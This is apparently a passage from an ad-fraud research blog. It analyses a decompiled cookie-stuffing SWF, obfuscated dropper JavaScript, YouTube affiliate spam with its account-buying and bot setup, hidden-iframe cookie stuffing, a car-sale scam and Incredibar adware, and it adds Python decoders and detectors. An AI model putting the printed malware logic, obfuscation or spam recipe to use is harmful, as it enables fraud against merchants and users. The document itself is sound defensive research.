            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            // the loader that fired COMPLETE; its data holds the variables
            // returned by the ASP file (safe flag plus twenty URLs)
            loader = URLLoader(event.target);
            safe = new Number(loader.data["safe"]);
            url1 = new String(loader.data["url1"]);
            url2 = new String(loader.data["url2"]);
            url3 = new String(loader.data["url3"]);
            url4 = new String(loader.data["url4"]);
            url5 = new String(loader.data["url5"]);
            url6 = new String(loader.data["url6"]);
            url7 = new String(loader.data["url7"]);
            url8 = new String(loader.data["url8"]);
            url9 = new String(loader.data["url9"]);
            url10 = new String(loader.data["url10"]);
            url11 = new String(loader.data["url11"]);
            url12 = new String(loader.data["url12"]);
            url13 = new String(loader.data["url13"]);
            url14 = new String(loader.data["url14"]);
            url15 = new String(loader.data["url15"]);
            url16 = new String(loader.data["url16"]);
            url17 = new String(loader.data["url17"]);
            url18 = new String(loader.data["url18"]);
            url19 = new String(loader.data["url19"]);
            url20 = new String(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                } catch(e:Error) {
                }
                // (remainder of the handler is not included in the dump)
            }
        }
    }
}//package flashcs_old_fla
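Finding strings hidden with String.fromCharCode is tedious by hand, so here is a decoder I have added as an example; it is not code from the original post or from the compromised site. It scans a script for fromCharCode calls with numeric arguments, rewrites each into a plain string literal, folds "a" + "b" chains so cookie names and URLs read as one string, and triages what was decoded. The sample script is constructed: it reuses the cookie check quoted above and stands in a placeholder payload URL (http://example.test/a.swf) for the address the page elides.

```python
import re

# Matches String.fromCharCode(...) calls whose arguments are plain numeric
# literals, which is the form the injected jQuery library above uses.
CALL_RE = re.compile(r"String\.fromCharCode\(\s*([0-9][0-9,\s]*)\)")
# Two adjacent JS string literals joined with '+', e.g. "baby" + "face".
CONCAT_RE = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')


def _codes_to_text(arglist):
    return "".join(chr(int(x)) for x in arglist.split(",") if x.strip())


def decode_calls(js):
    """Return [(offset, decoded_text)] for every fromCharCode call in the script."""
    return [(m.start(), _codes_to_text(m.group(1))) for m in CALL_RE.finditer(js)]


def inline_calls(js):
    """Rewrite the script so each encoded call becomes a plain string literal,
    then fold "a" + "b" chains so cookie names and URLs read as one string."""
    def as_literal(m):
        text = _codes_to_text(m.group(1))
        return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'
    out = CALL_RE.sub(as_literal, js)
    while True:
        folded = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', out)
        if folded == out:
            return out
        out = folded


def classify(text):
    """Rough triage of a decoded string: what kind of thing was being hidden?"""
    if re.match(r"https?://", text):
        return "url"
    if "<" in text:
        return "markup"
    if text.lower().endswith((".swf", ".js")):
        return "file"
    return "identifier"


def triage(js):
    """Unique decoded strings with their class, URLs and markup first."""
    order = {"url": 0, "markup": 1, "file": 2, "identifier": 3}
    items = {(classify(t), t) for _, t in decode_calls(js)}
    return sorted(items, key=lambda kt: (order[kt[0]], kt[1]))


# Constructed sample: the cookie check from the injected library quoted above,
# plus a payload URL encoded the same way. The URL is a placeholder, not the
# address the post's malware used.
_PLACEHOLDER_PAYLOAD = "http://example.test/a.swf"
SAMPLE_JS = (
    "(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){"
    "var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+\"=Yes;path=/\";"
    "var p=String.fromCharCode(" + ",".join(str(ord(ch)) for ch in _PLACEHOLDER_PAYLOAD) + ")"
    "+\"?i=\"+(new Date()).valueOf();}})();"
)

if __name__ == "__main__":
    for kind, text in triage(SAMPLE_JS):
        print(kind, text)
    print(inline_calls(SAMPLE_JS))
```

Run it over every script a page pulls in (the jQuery file here), not just the HTML, since that is where the dropper was hidden. The literal folding is a textual pass that does not understand JavaScript syntax, so treat its output as a triage aid and confirm hits in a debugger.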

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middlemen in these transactions, for they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser. Note the following:

  • Commission rate of "$2.65"/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates can not encourage consumers to sign-up with the advertiser by offering rewards the likes of cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):

Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser, the screenshot below shows the result.

This is what’s going on in the packet trace:

  1. Subscriber in the online forum decides he wants the $0.40 on offer in the online form
  2. He/she starts the task by navigating to
  3. Tinyurl redirects to which then uses Javascript and an HTML form to redirect the browser to (this essentially launders the referrer)
  4. sets up a full screen iframe which contains which redirects to the following affiliate click URL:;c=63867&a=105565&s1=tanks
  5. This URL redirects to which redirects to

So what you have here is an affiliate taking advantage of a price differentiation in two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 and sell $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).

YouTube Spam

By Wesley Brandi in CPL | Spam

Spend some time on YouTube and you may run into comments like

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following :

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a set of tainted comments (T); we consider a set of comments to be tainted when it contains spam. Having defined a function to determine if a set is tainted, we then get an idea of the scope of this problem by dividing T by N.”

Of course, it doesn’t take into account the rank of each spammy comment, but that’s why this is called a naive approach.

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we try to get a rough idea of how much of a problem this is by taking a look at only the default page presented when visiting This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013

There are 40 videos presented on the front page. If you’re going to try this for yourself at home, then you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:

youtube spam comment

For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health so how do they make their money?

Consider the comment on the first highlighted video presented:


This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page:\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse in a browser:

  • is Google’s URL Shortener.
  •\nb1Bak redirects to which redirects to
  • This then redirects to

“So is the spammer?”

No, is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’); he is paid a finder’s fee when YouTube users sign up with

Now this may or may not violate surveyjunkie’s acceptable terms, although I could not find a policy detailing these terms. Of interest from the packet trace is that the Web request through to does not contain a referrer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to via two affiliates (klenzxcp and gqrzv5sx):

Modus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free, but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things:

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his weight will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5

youtube pva accounts

  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comment’s section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non PVA) YouTube accounts for $5

buy youtube  accounts

  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of sets A and B.

“It’s all out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments, is that the same comment after being taken down will quickly make its way back to the top. I’d make a bet that there’s low hanging fruit to be had here by combining user feedback on tainted comments with a unique hash on the comment itself. In doing so one could block the comment at the front door.

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.
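As an added example (not from the original post), here is one way to put the two ideas above together in Python: the naive T/N scope measure from the Scope of the Problem section, and a front-door filter that combines community reports with a normalized comment hash and resolves each outbound link to see whether its chain ends on a CPL advertiser. All hosts, the redirect table and the comments are constructed placeholders, and the redirect lookup is a table rather than live HTTP.

```python
import hashlib
import re
import unicodedata
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Constructed redirect table standing in for live lookups of each outbound
# link. Hosts are placeholders; the last hop of a CPL chain is the advertiser.
REDIRECTS = {
    "http://short.example.test/abc12": "http://affiliate.example.test/click?aff=a1",
    "http://affiliate.example.test/click?aff=a1": "https://survey-offer.example.test/signup",
    "http://short.example.test/new1": "https://survey-offer.example.test/signup?aff=a2",
    "http://loop.example.test/a": "http://loop.example.test/b",
    "http://loop.example.test/b": "http://loop.example.test/a",
}
CPL_ADVERTISERS = {"survey-offer.example.test"}  # constructed denylist


def normalize(text):
    """Case-fold, unify unicode, swap links for a token and drop punctuation so
    a comment re-posted with cosmetic tweaks or a rotated short link
    still fingerprints the same."""
    text = unicodedata.normalize("NFKC", text).lower()
    text = URL_RE.sub(" <url> ", text)
    text = re.sub(r"[^a-z0-9<>]+", " ", text)
    return " ".join(text.split())


def fingerprint(text):
    return hashlib.sha256(normalize(text).encode("utf-8")).hexdigest()


def resolve(url, redirects=REDIRECTS, max_hops=10):
    """Follow the redirect chain; stop on a cycle or after max_hops."""
    seen = set()
    while url in redirects and url not in seen and len(seen) < max_hops:
        seen.add(url)
        url = redirects[url]
    return url


def cpl_links(text):
    """Outbound links whose chain ends on a known CPL advertiser."""
    return [u for u in URL_RE.findall(text)
            if (urlsplit(resolve(u)).hostname or "").lower() in CPL_ADVERTISERS]


class SpamGate:
    """Front-door filter: community reports feed a set of comment fingerprints;
    a comment is tainted if its fingerprint is known or it links to a CPL advertiser."""

    def __init__(self):
        self.blocked = set()

    def report(self, text):
        self.blocked.add(fingerprint(text))

    def is_tainted(self, text):
        return fingerprint(text) in self.blocked or bool(cpl_links(text))


def taint_ratio(videos, gate):
    """The naive measure from the post: tainted videos T divided by all videos N."""
    tainted = sum(1 for comments in videos.values()
                  if any(gate.is_tainted(c) for c in comments))
    return tainted / len(videos)


# Constructed sample set: five videos, two spam postings of the kind quoted in
# the post (one a cosmetic rewrite with a rotated link), one new-wording spam.
SPAM = ("This is how i am making tons of money every single month working at "
        "my house.. Step 1: Follow the guide on this page: "
        "http://short.example.test/abc12 Step 2: Get paid 5-20 bucks to answer each survey")
SPAM_VARIANT = ("THIS IS HOW I AM MAKING TONS OF MONEY EVERY SINGLE MONTH WORKING AT "
                "MY HOUSE!!! Step 1 - follow the guide on this page: "
                "http://short.example.test/qq7 ... Step 2 - get paid 5-20 bucks to answer each survey")
VIDEOS = {
    "v1": ["great track", SPAM],
    "v2": ["first!", "loved this"],
    "v3": [SPAM_VARIANT],  # punctuation changed and short link rotated
    "v4": ["earn cash answering surveys http://short.example.test/new1"],
    "v5": ["check my channel http://loop.example.test/a"],  # redirect loop, not CPL
}

if __name__ == "__main__":
    gate = SpamGate()
    print("before reports:", taint_ratio(VIDEOS, gate))
    gate.report(SPAM)  # community flags the first posting
    print("after report:  ", taint_ratio(VIDEOS, gate))
```

Before any report, v1 and v4 are caught purely by where their links end up; once the community flags the v1 comment, its fingerprint also catches the reworded copy on v3 even though that copy carries a fresh short link that the redirect table does not know. That is the point of hashing the normalized text with links replaced by a token: rotating the shortener does not buy the spammer a new comment.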

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason is that Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on, casual inspection yields nothing out of the ordinary.

affiliate fraud

Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">

This is HTML that will invisibly load the affiliate click link and in turn the merchant that it routes through to (resulting in applicable cookies pushed onto the user’s machine), in this case it is . I dynamically modified the page to reveal what was hidden; follow the red arrow below



As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing


Upon casual inspection, reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!

affiliate fraud

There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, is invisibly forcing affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, then Bestpcantivirus will be paid a commission for they claim themselves as the entity responsible for the purchase. This is fine if you clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag with a src attribute set to a link which will redirect through to an affiliate click link (CJ affiliate id 5727502) and then onto Norton.


Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1, this way you won’t see it if you are just browsing casually. I dynamically modified the DOM to alter the dimensions of this image to 50×50, the red arrow highlights what is really going on:

affiliate fraud

As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:

    Merchant       CJ Affiliate Id
    AVG            5727502
    Eset           3840211
    F-Secure       3840211
    Kaspersky      5727502
    Pandasecurity  5727502
    Zonealarm      3840211
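A scanner for the pattern both the Linkshare post and this bestpcantivirus post rely on (a 1×1 or display:none iframe, img, object or embed whose source is an affiliate click link), added here as an example and not part of the original posts. It uses Python's html.parser; the affiliate click hosts, the aff query parameter and the sample page are constructed placeholders, so substitute the click-link hosts and parameter names of the networks you actually watch.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed placeholders standing in for an affiliate network's click-link
# hosts and the query parameter that carries the affiliate id on such links.
CLICK_HOSTS = {"click.affnet.example.test", "track.affnet.example.test"}
AFFILIATE_PARAM = "aff"
SRC_ATTR = {"iframe": "src", "img": "src", "embed": "src", "object": "data"}


def _dim(value):
    """Parse a width/height attribute such as '1', '1px' or '300'; None if absent."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def _hidden_by_style(style):
    s = (style or "").replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s


class HiddenLoaderScanner(HTMLParser):
    """Collects elements that load a remote resource while being invisible,
    and notes when that resource is an affiliate click link."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in SRC_ATTR:
            return
        a = dict(attrs)  # html.parser lower-cases attribute names for us
        src = a.get(SRC_ATTR[tag])
        if not src:
            return
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        reasons = []
        w, h = _dim(a.get("width")), _dim(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("1x1")
        if _hidden_by_style(a.get("style")):
            reasons.append("display:none")
        if host in CLICK_HOSTS:
            reasons.append("affiliate click host")
        if not reasons:
            return  # an ordinary, visible resource load
        invisible = "1x1" in reasons or "display:none" in reasons
        self.findings.append({
            "tag": tag,
            "src": src,
            "host": host,
            "reasons": reasons,
            "affiliate_id": parse_qs(parts.query).get(AFFILIATE_PARAM, [None])[0],
            # invisible AND affiliate link is the cookie-stuffing signature;
            # an invisible pixel to some other host is merely worth a look
            "severity": "high" if invisible and host in CLICK_HOSTS else "low",
        })


def scan(html):
    parser = HiddenLoaderScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def stuffed_affiliate_ids(html):
    """Affiliate ids that invisible click-link loads on the page would credit."""
    return sorted({f["affiliate_id"] for f in scan(html)
                   if f["severity"] == "high" and f["affiliate_id"]})


# Constructed sample page: one visible banner, a hidden iframe and a 1x1 image
# that both hit click links, a harmless 1x1 analytics pixel, and a visible
# affiliate link that a user may legitimately click.
SAMPLE_HTML = """
<html><body>
<h1>Top 3 antivirus reviews</h1>
<img src="http://cdn.example.test/banner.png" width="300" height="60">
<iframe src="http://click.affnet.example.test/click?aff=100001&amp;offer=av1"
        WIDTH=1 HEIGHT=1 FRAMEBORDER=1 style="display:none"></iframe>
<img src="http://track.affnet.example.test/r?aff=100002" width="1" height="1">
<img src="http://stats.example.test/p.gif" width="1" height="1">
<a href="http://click.affnet.example.test/click?aff=100001">Buy now</a>
</body></html>
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML):
        print(f["severity"], f["tag"], f["host"], f["affiliate_id"], ", ".join(f["reasons"]))
```

The anchor tag is deliberately left alone: a visible click link the user chooses to follow is how affiliate marketing is meant to work, and it is the invisible load that earns the unearned commission. Static HTML only catches what is in the served page, so pair this with the packet trace for iframes that are injected by script or by adware after load.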

Recall that the Bargain Hunter scam is a four pronged attack:

1. Scammer Sets the Trap

This ad has a 2002 Toyota Tacoma PreRunner up for grabs at $5,582.

It’s a pretty good deal, designed to whet my appetite and have me get in touch with the seller thinking that there’s a great deal here, i.e., it’s an entry point to a Bargain Hunter scam.

2. Victim Takes the Bait

First response from the seller:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma‏

I still have my  2002 Toyota Tacoma Double Cab SR-5 TRD Pre-runner 
with 3.4 V-6, automatic transmission.Used 128k miles ,VIN# 
5tegn92n72z012744 .

I will take only $5500 total price shipping included from Medford OR,
i have my own trailer to have the truck delivered to you.It has a 
clear title ready to be signed and notarized on your name.

Runs great,no problems at all,garage kept only.  I can offer a 7 days 

More pics attached here:

The Photobucket link shows pictures of the car that are not available in the original ad (so this must be legit, right?)

3. Scammer Gains Victim’s Trust

It stands to reason that nobody in their right mind would engage in a financial transaction involving a large sum of money, someone they have never met and a car they have never seen. More so when the first act of good faith must come from the buyer, i.e., send the money first and then you will receive the goods.

Ah, but what about an entity that I trust? I do transactions of this nature every day with Amazon right? So of course I will send money to them and then wait for delivery, if not for any other reason than they always deliver no matter what. Doesn’t take much to see how scammers will exploit this.

Email correspondence eventually received from the scammer when asking about how the transaction will take place:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma‏

I have a contract with Amazon Payments so we can go through 
their Protection Program.

According with  the Amazon you have 7 days after you receive 
the car to inspect it and decide if you want to BUY IT or NOT.

Here is how it will work:

 1.First of all I will need  the following details from you:
 - Full Name
 - Full Address

 2. After I will receive the details from you, I will forward 
 them to Amazon.

 3. After they will process your info, they will send us both 
 invoices. You will receive the invoice with the details on 
 how to make a refundable payment to Amazon.They will hold 
 your payment while you test and inspect the vehicle at your
 home for a week.

 4. Amazon will contact me to ship the car to you. After you 
 receive the car you will have 7 days to test, verify and do 
 whatever you need to the car.  If you will decide to buy the 
 car, then I will get  the money from Amazon.

 5. If you will decide that you do not buy the car,  Amazon 
 will refund your payment same day.

I look forward to hearing from you . 

Thank you

Upon accepting these terms, I quickly got an email from someone claiming to be Amazon. The Amazon email actually comes from a Live account: Amazon FPS (

4. Victim Sends Money

Once I send the money through Money Gram then it’s gone. I won’t hear from the seller again and the car will never arrive. I could get in touch with Amazon but they won’t know what I’m talking about (obviously because they were never involved).

I give this scammer 1/10:

  • 1 point for a very basic Bargain Hunter scam

As is usually the case, the scammer could have done a lot more here to improve the scam. He didn’t screen calls, he didn’t sample responses and he did not go the extra mile when I asked for additional photos of the rear view mirror (saying that his kids broke his camera). Like most of the drivel out there, he is a bottom of the barrel scammer.

So sad to think that sooner or later the scammer behind this ad is going to catch another victim, he wouldn’t be doing this otherwise.

Co-authored with Ben Edelman

On a computer running Perion Incredibar adware, our crawler browses the site.  Incredibar sees this traffic and invisibly invokes the CJ click link with publisher ID 7164280, which redirects back to Cafepress.

Because the toolbar drops CJ cookies invisibly, there is nothing for us to show in a screenshot.  But the network trace confirms what occurred and confirms that the affiliate link was invoked invisibly.  Specifically, notice the creation of an invisible IFRAME called tbm_stat (CSS style of display:none, hence invisible).  Loaded inside that IFRAME is which creates another invisible IFRAME called tbmi_stat, again CSS display:none.  Within this doubly-invisible IFRAME, the redirect flow sends traffic onwards to the CJ click link — confirming that the cookie-drop occurs completely invisibly.

If a user subsequently makes a purchase, CJ and Cafepress records will credit affiliate 7164280 with purportedly causing that purchase.  But in fact the user was already at the Cafepress site before the Incredibar adware and this affiliate 7164280 intervened.  They did nothing to cause or encourage the user’s purchase, and any payments to this affiliate are entirely wasted.

Meanwhile, Incredibar’s advertising fraud is also notable in that Incredibar is made by Perion, a publicly-traded company (NASDAQ: PERI).  We see no obvious mechanism whereby Perion could diffuse blame or responsibility to any third party.  Investors would no doubt be surprised to learn that Perion’s revenue sources include affiliate fraud.